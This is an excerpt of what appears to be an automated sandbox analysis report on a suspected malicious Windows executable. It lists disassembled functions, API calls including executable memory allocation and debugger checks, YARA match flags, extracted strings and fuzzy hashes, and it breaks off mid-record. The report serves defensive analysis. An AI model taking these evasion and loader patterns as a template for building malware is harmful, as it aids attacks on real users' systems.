                                                                  • Associated: 00000000.00000002.1816767087.0000000000464000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                  Similarity
                                                                  • API ID: __amsg_exit$_fast_error_exit$CommandInitializeLine__cinit__ioinit__mtinit__wsetargv__wsetenvp__wwincmdln
                                                                  • String ID:
                                                                  • API String ID: 2477803136-0

                                                                  Control-flow Graph

                                                                  control_flow_graph 146 630420-6304f8 148 6304fa 146->148 149 6304ff-63053c CreateWindowExA 146->149 150 6305aa-6305ad 148->150 151 630540-630558 PostMessageA 149->151 152 63053e 149->152 153 63055f-630563 151->153 152->150 153->150 154 630565-630579 153->154 154->150 156 63057b-630582 154->156 157 630584-630588 156->157 158 6305a8 156->158 157->158 159 63058a-630591 157->159 158->153 159->158 160 630593-630597 call 630110 159->160 162 63059c-6305a5 160->162 162->158
                                                                  APIs
                                                                  • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 00630533
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateWindow
                                                                  • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                                                                  • API String ID: 716092398-2341455598

                                                                  Control-flow Graph

                                                                  control_flow_graph 163 6305b0-6305d5 164 6305dc-6305e0 163->164 165 6305e2-6305f5 GetFileAttributesA 164->165 166 63061e-630621 164->166 167 630613-63061c 165->167 168 6305f7-6305fe 165->168 167->164 168->167 169 630600-63060b call 630420 168->169 171 630610 169->171 171->167
                                                                  APIs
                                                                  • GetFileAttributesA.KERNELBASE(apfHQ), ref: 006305EC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID: apfHQ$o
                                                                  • API String ID: 3188754299-2999369273

                                                                  Control-flow Graph

                                                                  control_flow_graph 185 408f76-408f98 HeapCreate 186 408f9a-408f9b 185->186 187 408f9c-408fa5 185->187
                                                                  APIs
                                                                  • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00408F8B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816651678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1816631636.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816651678.000000000042A000.00000020.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816702499.0000000000457000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816723648.0000000000458000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816747545.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816767087.0000000000464000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CreateHeap
                                                                  • String ID:
                                                                  • API String ID: 10892065-0

                                                                  Control-flow Graph

                                                                  control_flow_graph 188 40b5d3-40b5dd call 40b438 190 40b5e2-40b5ef 188->190
                                                                  APIs
                                                                  • __setmbcp.LIBCMT ref: 0040B5DD
                                                                    • Part of subcall function 0040B438: __getptd.LIBCMT ref: 0040B448
                                                                    • Part of subcall function 0040B438: getSystemCP.LIBCMT ref: 0040B45D
                                                                    • Part of subcall function 0040B438: __malloc_crt.LIBCMT ref: 0040B473
                                                                    • Part of subcall function 0040B438: __setmbcp_nolock.LIBCMT ref: 0040B496
                                                                    • Part of subcall function 0040B438: InterlockedDecrement.KERNEL32(?), ref: 0040B4AE
                                                                    • Part of subcall function 0040B438: InterlockedIncrement.KERNEL32(00000000), ref: 0040B4D3
                                                                    • Part of subcall function 0040B438: __lock.LIBCMT ref: 0040B4EE
                                                                    • Part of subcall function 0040B438: InterlockedDecrement.KERNEL32 ref: 0040B565
                                                                    • Part of subcall function 0040B438: InterlockedIncrement.KERNEL32(00000000), ref: 0040B589
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816651678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1816631636.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816651678.000000000042A000.00000020.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816702499.0000000000457000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816723648.0000000000458000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816747545.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816767087.0000000000464000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Interlocked$DecrementIncrement$System__getptd__lock__malloc_crt__setmbcp__setmbcp_nolock
                                                                  • String ID:
                                                                  • API String ID: 3661747109-0

                                                                  Control-flow Graph

                                                                  control_flow_graph 191 567fc2-567ffc call 5682d5 194 567ffe-568031 VirtualAlloc call 56804f 191->194 195 56804a 191->195 197 568036-568048 194->197 195->195 197->195
                                                                  APIs
                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00568013
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816811085.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_560000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  APIs
                                                                  • SetFileAttributesW.KERNEL32(00000000,00000000), ref: 004042E7
                                                                  • GetCommConfig.KERNEL32(00000000,00000000,00000000), ref: 0040432A
                                                                  • EnumCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404347
                                                                  • GetLogicalDriveStringsA.KERNEL32(00000000,?), ref: 00404356
                                                                  • SetComputerNameA.KERNEL32(00000000), ref: 0040435E
                                                                  • ChangeTimerQueueTimer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040436C
                                                                  • GetTempFileNameW.KERNEL32(00000000,00000000,00000000,?), ref: 0040437F
                                                                  • EnumTimeFormatsA.KERNEL32(00000000,00000000,00000000), ref: 0040438B
                                                                  • WriteConsoleInputW.KERNEL32(00000000,00000000,00000000,?), ref: 0040439B
                                                                  • GetVersionExA.KERNEL32(?), ref: 004043A8
                                                                  • InterlockedIncrement.KERNEL32(?), ref: 004043B2
                                                                  • GlobalUnWire.KERNEL32(00000000), ref: 004043C6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816651678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1816631636.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816651678.000000000042A000.00000020.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816702499.0000000000457000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816723648.0000000000458000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816747545.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816767087.0000000000464000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                  Similarity
                                                                  • API ID: EnumFileNameTimer$AttributesCalendarChangeCommComputerConfigConsoleDriveFormatsGlobalIncrementInfoInputInterlockedLogicalQueueStringsTempTimeVersionWireWrite
                                                                  • String ID:
                                                                  • API String ID: 1727374683-3916222277
                                                                  APIs
                                                                  • __Init_thread_footer.LIBCMT ref: 006349E6
                                                                  • __Init_thread_footer.LIBCMT ref: 00634BC2
                                                                  • __Init_thread_footer.LIBCMT ref: 00634EB7
                                                                  • __Init_thread_footer.LIBCMT ref: 0063507D
                                                                  • __Init_thread_footer.LIBCMT ref: 00635A7D
                                                                  • __Init_thread_footer.LIBCMT ref: 00635D8B
                                                                  • __Init_thread_footer.LIBCMT ref: 00635315
                                                                    • Part of subcall function 00641142: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00641176
                                                                  • __Init_thread_footer.LIBCMT ref: 0063557E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Init_thread_footer$Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                  • String ID: O@K\$Y@BA$ZK\.$rmBK
                                                                  • API String ID: 829385169-2391139619
                                                                  APIs
                                                                  • IsDebuggerPresent.KERNEL32 ref: 0040C8A9
                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040C8BE
                                                                  • UnhandledExceptionFilter.KERNEL32(00401D50), ref: 0040C8C9
                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 0040C8E5
                                                                  • TerminateProcess.KERNEL32(00000000), ref: 0040C8EC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816651678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1816631636.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816651678.000000000042A000.00000020.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816702499.0000000000457000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816723648.0000000000458000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816747545.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816767087.0000000000464000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                  • String ID: +`q
                                                                  • API String ID: 2579439406-3158646234
                                                                  APIs
                                                                  • __NMSG_WRITE.LIBCMT ref: 004050B1
                                                                    • Part of subcall function 0040756C: __set_error_mode.LIBCMT ref: 0040759D
                                                                    • Part of subcall function 0040756C: __set_error_mode.LIBCMT ref: 004075AE
                                                                    • Part of subcall function 0040756C: _strcpy_s.LIBCMT ref: 004075E2
                                                                    • Part of subcall function 0040756C: __invoke_watson.LIBCMT ref: 004075F3
                                                                    • Part of subcall function 0040756C: GetModuleFileNameA.KERNEL32(00000000,0045D209,00000104,?,74DEDFA0,00000000,004045FB,00000000), ref: 0040760F
                                                                    • Part of subcall function 0040756C: _strcpy_s.LIBCMT ref: 00407624
                                                                    • Part of subcall function 0040756C: __invoke_watson.LIBCMT ref: 00407637
                                                                    • Part of subcall function 0040756C: _strlen.LIBCMT ref: 00407640
                                                                    • Part of subcall function 0040756C: _strlen.LIBCMT ref: 0040764D
                                                                    • Part of subcall function 0040756C: __invoke_watson.LIBCMT ref: 0040767A
                                                                  • _raise.LIBCMT ref: 004050C2
                                                                  • _memset.LIBCMT ref: 0040515A
                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040518C
                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 00405199
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816651678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1816631636.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816651678.000000000042A000.00000020.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816702499.0000000000457000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816723648.0000000000458000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816747545.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816767087.0000000000464000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                  Similarity
                                                                  • API ID: __invoke_watson$ExceptionFilterUnhandled__set_error_mode_strcpy_s_strlen$FileModuleName_memset_raise
                                                                  • String ID:
                                                                  • API String ID: 4212829890-0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 61f5f756535a4035ede993857695048258d02a8dbd85f3cae79bbcafaed150b5
                                                                  • Instruction ID: 326ab3f565ee83fa2292557319c41d3fdf3d2cc2b69d70cd15c70191a03ea170
                                                                  • Opcode Fuzzy Hash: 61f5f756535a4035ede993857695048258d02a8dbd85f3cae79bbcafaed150b5
                                                                  • Instruction Fuzzy Hash: 99022C71E012199BDF14CFA9C8806EEBBF2FF49314F258269D519EB341D731AA41CB94
                                                                  APIs
                                                                    • Part of subcall function 00641142: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00641176
                                                                  • __Init_thread_footer.LIBCMT ref: 00635A7D
                                                                  • __Init_thread_footer.LIBCMT ref: 00635D8B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Init_thread_footer$Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                  • String ID: @BAO
                                                                  • API String ID: 829385169-3327130826
                                                                  • Opcode ID: 5a2adfa9a8e76322d9d4f0e9a0b103782ff5a58ac098cfd4e8d6cdf4395ee2d3
                                                                  • Instruction ID: 5ab3c7c851d78fcc3503770914e915bc69e0b7fd74eb026f70b6beb93141e4f0
                                                                  • Opcode Fuzzy Hash: 5a2adfa9a8e76322d9d4f0e9a0b103782ff5a58ac098cfd4e8d6cdf4395ee2d3
                                                                  • Instruction Fuzzy Hash: 20320470D002549BDB28DF24DD497EEBBB2AF05300F5482EDE4096B292DB759E84CF99
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 0
                                                                  • API String ID: 0-4108050209
                                                                  • Opcode ID: 1477b8570e16a6675b5a24fac6283d2c6c9a0facf3c5b7642ca230b5911b600f
                                                                  • Instruction ID: 41b76c1d05794ad5f40ed2315f3ea44ae8ae93d52606ed905e389f579c4a47a6
                                                                  • Opcode Fuzzy Hash: 1477b8570e16a6675b5a24fac6283d2c6c9a0facf3c5b7642ca230b5911b600f
                                                                  • Instruction Fuzzy Hash: C0C1AC70D0060A9FCB29CF68C594BBABBB7EF05314F144639E496977A1C331AD46CB91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 0
                                                                  • API String ID: 0-4108050209
                                                                  • Opcode ID: e800e0acd95fef6be5267f16a41e9219e19d51ae5af7834d1b3ead906566773c
                                                                  • Instruction ID: 37cdacebf21a1e1935b3c79d1a28beae2977fa3708ca29e291089d006e4e50c0
                                                                  • Opcode Fuzzy Hash: e800e0acd95fef6be5267f16a41e9219e19d51ae5af7834d1b3ead906566773c
                                                                  • Instruction Fuzzy Hash: B6B1B171D0060A8BCB288F68D9956FEBBB3AF21314F14463EE452D77A1C6319E02CBD5
                                                                  APIs
                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00008208), ref: 0040824F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816651678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1816631636.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816651678.000000000042A000.00000020.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816702499.0000000000457000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816723648.0000000000458000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816747545.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816767087.0000000000464000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled
                                                                  • String ID:
                                                                  • API String ID: 3192549508-0
                                                                  • Opcode ID: 962a8472a63a494c35fba3ba6a56462e9634be2c334d1371b6710703fa2ac6f9
                                                                  • Instruction ID: 8e0b76bb6c35fa1030474a654a12f6ca606bab1367b594b8588413907081c95e
                                                                  • Opcode Fuzzy Hash: 962a8472a63a494c35fba3ba6a56462e9634be2c334d1371b6710703fa2ac6f9
                                                                  • Instruction Fuzzy Hash: 8090027026258046C60017745F2964625D06B9970275105F96191E54F5DE7440405D19
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816811085.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_560000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: r{V
                                                                  • API String ID: 0-3874959824
                                                                  • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                  • Instruction ID: 7547a280daf62bece5a9912f5ff5320ecb41f9330903bed8b78dce654b405011
                                                                  • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                  • Instruction Fuzzy Hash: 0511AC72344104AFE754DE59DCC1EA677EAFB8C324B298065E904CB316E675EC41CB60
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                                                                  • Instruction ID: 64e73347b27d96193e933e2be5be900b4b4704e63f64701868df5deba6109a95
                                                                  • Opcode Fuzzy Hash: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                                                                  • Instruction Fuzzy Hash: D2B14D316106089FD719CF28C486B957BE2FF46364F258658F899CF3A2C375EA92CB41
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0087427e5fec96f3a69268fd39bcd2ddcdf30d7205d75486cccbac6015e6632e
                                                                  • Instruction ID: 3706870c7d0fd336ae813660b21942faf241decdbbc9b7789a2df66aabc7e769
                                                                  • Opcode Fuzzy Hash: 0087427e5fec96f3a69268fd39bcd2ddcdf30d7205d75486cccbac6015e6632e
                                                                  • Instruction Fuzzy Hash: CE5146B1E006098FDB24CF94D8857AABBF1FF48315F24802AD445EB760D3759942DF99
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                  • Instruction ID: fa79645b8b35bdde3b805aaa583de82a09556725003c3e10fe3f01b73303ac72
                                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                  • Instruction Fuzzy Hash: 6D11E6B72001C1C3D61C8A3DD8B4AFBA797EAD5330F2D426AF0516B754D723A9459B80
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                  • Instruction ID: a001d1b96123b8c1fec73e420cd133c101559f4059f10a477b46003edffb971c
                                                                  • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                  • Instruction Fuzzy Hash: 2A1170723401009FE758DE65DCE1FA673EAEB88320B298155E908CB312D775EC06C7A0
                                                                  APIs
                                                                  • OpenJobObjectA.KERNEL32(00000000,00000000,00000000), ref: 00404476
                                                                  • GetConsoleAliasExesW.KERNEL32(?,00000000), ref: 00404481
                                                                  • CallNamedPipeW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00404491
                                                                  • SetFileShortNameW.KERNEL32(00000000,00000000), ref: 0040449B
                                                                  • SetEndOfFile.KERNEL32(00000000), ref: 004044A3
                                                                  • GetTimeFormatW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004044B5
                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004044B9
                                                                  • TlsSetValue.KERNEL32(00000000,00000000), ref: 004044C3
                                                                  • TlsFree.KERNEL32(00000000), ref: 004044CB
                                                                  • GetTimeFormatW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004044DD
                                                                  • SetFileAttributesW.KERNEL32(00000000,00000000), ref: 004044E3
                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 004044F4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816651678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1816631636.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816651678.000000000042A000.00000020.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816702499.0000000000457000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816723648.0000000000458000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816747545.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816767087.0000000000464000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                  Similarity
                                                                  • API ID: File$FormatModuleNameTime$AliasAttributesCallConsoleExesFreeHandleNamedObjectOpenPipeShortValue
                                                                  • String ID:
                                                                  • API String ID: 3844511171-0
                                                                  • Opcode ID: 1935943dd116d173574aa202059ca19e8382479f5388a712a89336f12b395794
                                                                  • Instruction ID: 6eef1a2b3a88ac42684db504e9d2595e70c362ee28e71386d382e67a0f303c74
                                                                  • Opcode Fuzzy Hash: 1935943dd116d173574aa202059ca19e8382479f5388a712a89336f12b395794
                                                                  • Instruction Fuzzy Hash: 5C21D635640304ABE350ABE4ED4AF997774FB48B02F104036F349B61E0CAB05984CB6A
                                                                  APIs
                                                                  • type_info::operator==.LIBVCRUNTIME ref: 0063C73A
                                                                  • ___TypeMatch.LIBVCRUNTIME ref: 0063C848
                                                                  • _UnwindNestedFrames.LIBCMT ref: 0063C99A
                                                                  • CallUnexpected.LIBVCRUNTIME ref: 0063C9B5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                  • String ID: csm$csm$csm
                                                                  • API String ID: 2751267872-393685449
                                                                  • Opcode ID: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                                                                  • Instruction ID: 27fa5773238f0b875fee7c617692f6b4ca9aee66a48a3dab80d5ce54ee57146e
                                                                  • Opcode Fuzzy Hash: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                                                                  • Instruction Fuzzy Hash: 18B16571800209AFCF28DFA4C981AAEBBBABF18320F15455AF8157B242D731DA51CFD5
                                                                  APIs
                                                                  • __getptd.LIBCMT ref: 0040B13F
                                                                    • Part of subcall function 00408CA0: __getptd_noexit.LIBCMT ref: 00408CA3
                                                                    • Part of subcall function 00408CA0: __amsg_exit.LIBCMT ref: 00408CB0
                                                                  • __amsg_exit.LIBCMT ref: 0040B15F
                                                                  • __lock.LIBCMT ref: 0040B16F
                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040B18C
                                                                  • InterlockedIncrement.KERNEL32(00722C40), ref: 0040B1B7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816651678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1816631636.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816651678.000000000042A000.00000020.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816702499.0000000000457000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816723648.0000000000458000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816747545.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816767087.0000000000464000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                  • String ID: @,r$@xE
                                                                  • API String ID: 4271482742-2491494317
                                                                  • Opcode ID: 14da587c5bdc05ef8bc0ce193ba3e66b09e327f1db3aba0da4d18ea377a9ac98
                                                                  • Instruction ID: 3c6ac1de8d366cc5c0bc841ef81be65421d856afbd51984a86e4acfea4938c9b
                                                                  • Opcode Fuzzy Hash: 14da587c5bdc05ef8bc0ce193ba3e66b09e327f1db3aba0da4d18ea377a9ac98
                                                                  • Instruction Fuzzy Hash: 8C01A1319047219BDB21AB29A85975A73A0AF04B95F05013BE8107B3E2CB3CAD40CBDD
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
